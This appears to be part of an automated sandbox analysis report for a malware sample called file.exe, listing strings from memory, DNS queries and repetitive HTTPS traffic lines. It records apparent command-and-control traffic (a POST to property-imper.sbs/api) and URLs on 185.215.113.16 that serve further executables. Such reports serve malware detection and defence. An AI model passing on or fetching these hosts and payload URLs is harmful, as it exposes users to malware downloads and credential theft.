              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: file.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
              Source: file.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2448272714.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000002.2575295254.0000000000EFB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
              Source: file.exe, 00000000.00000003.2360974253.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2575484115.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2448272714.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exes
              Source: file.exe, 00000000.00000003.2360974253.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2575484115.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2448272714.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2361068010.0000000001211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microP5
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_102.7.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_102.7.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_102.7.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_102.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_102.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_102.7.drString found in binary or memory: https://github.com/nschonni
              Source: chromecache_102.7.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: file.exe, 00000000.00000003.2185548493.0000000001223000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186122101.0000000001226000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361102069.0000000001207000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214176802.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
              Source: file.exe, 00000000.00000003.2361133423.000000000121B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361068010.0000000001211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/Q
              Source: file.exe, 00000000.00000003.2262576361.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238942024.0000000001227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
              Source: file.exe, 00000000.00000003.2214176802.0000000001226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apida
              Source: file.exe, 00000000.00000003.2262622308.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2264759804.0000000001236000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2262259485.0000000001224000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2264702772.0000000001234000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2262576361.0000000001227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apil
              Source: chromecache_83.7.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.2240416920.0000000005A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2240416920.0000000005A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_83.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.2240312873.00000000057E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: file.exe, 00000000.00000003.2240312873.00000000057E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: file.exe, 00000000.00000003.2240416920.0000000005A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: file.exe, 00000000.00000003.2240416920.0000000005A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: file.exe, 00000000.00000003.2240416920.0000000005A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
